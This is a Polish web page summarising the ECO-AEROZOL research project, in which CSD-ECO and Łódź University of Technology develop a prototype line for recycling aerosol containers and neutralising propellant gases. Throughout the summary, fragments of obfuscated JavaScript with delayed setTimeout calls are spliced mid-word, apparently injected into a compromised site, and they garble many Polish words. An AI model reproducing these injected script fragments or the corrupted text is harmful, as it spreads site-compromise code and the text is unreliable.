CSD-ECO sp. z o.o. we współpracy z Politechniką Łódzką realizuje innowacyjny projekt:

TYTUŁ PROJEKTU

ECO-AEROZOL. OPRACOWANIE W RAMACH B+R INNOWACYJNEJ LINII PROTOTYPOWEJ DO KOMPLEKSOWEGO ODZYSKU POJEMNIKÓW CIŚNIENIOWYCH i NEUTRALIZACJI GAZÓW ROBOCZYCH

STRESZCZENIE PROJEKTU

Szeroko sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowane opakowania aerozolowe są jednym z poważniejszych wyzwań w dziedzinie zagrożeń środowiska naturalnego ze względu na zawardom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tość szeregu lotnych, ciekłych oraz stałych substancji. Stąd istnieje silna potrzeba ich recyklingu oraz odzysku powstałego odpadu w postaci częściowo opróżnionego pojemnika. Według Europejskiej Fundacji Aerozolowej (FEA), Europa jest największym producentem wyrobów w pojemnikach ciśnieniowych. Za raportem FEA za 2015 r. (jak i w latach poprzednich), jest dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ilość powyżej 5,5 miliarda opakowań rocznie. Polska w latach 2011 – 2014 wytworzyła ponad 110 milionów szt. rocznie, co daje 8 pozycję wśród producentów w Europie. Odzysk materiałów z opakowań jest niewielki. W Polsce sięga 8,4% w relacji do ilości materiałów zużytych w produkcji tych opakowań. Przyczyną jest złożona budowa pojemników z użyciem wielu różnych materiałów. Ponaddom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, pojemniki wypełniane są produktem do rozpylenia i gazem roboczym, którego rolą jest ciśnieniowe opróżnianie produktu. Najczęściej sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowane gazy robocze dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to gazy palne szkodliwe dla środowiska.

CELEM PROJEKTU ECO-AEROZOL jest stworzenie nowadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torskiej prodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totypowej linii technologii w pełni bezpiecznego dla środowiska odzysku opakowań ciśnieniowych z kontrolowanym uwalnianiem gazów roboczych przy użyciu polskiej myśli naukowej. Cel ten zostanie osiągnięty w oparciu o ścisłą współpracę Wnioskodawcy/Głównego realizadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tora projektu (CSD-ECO) z Konsorcjum jednostek naukowych z Politechniki Łódzkiej (Podwykonawca).

Ocena projektu: 21pkt./23: Pierwsze miejsce w Polsce (exequo ze spółką PROMAN) w naborze lisdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topad 2017 (na 90 projektów), instytucja wdrażająca NCBR

Projekt realizowany jest od grudnia 2018 roku; zakończenie planowane na połowę 2022 r.

Kierownik zarządzający projektem

Dr Anna Fligel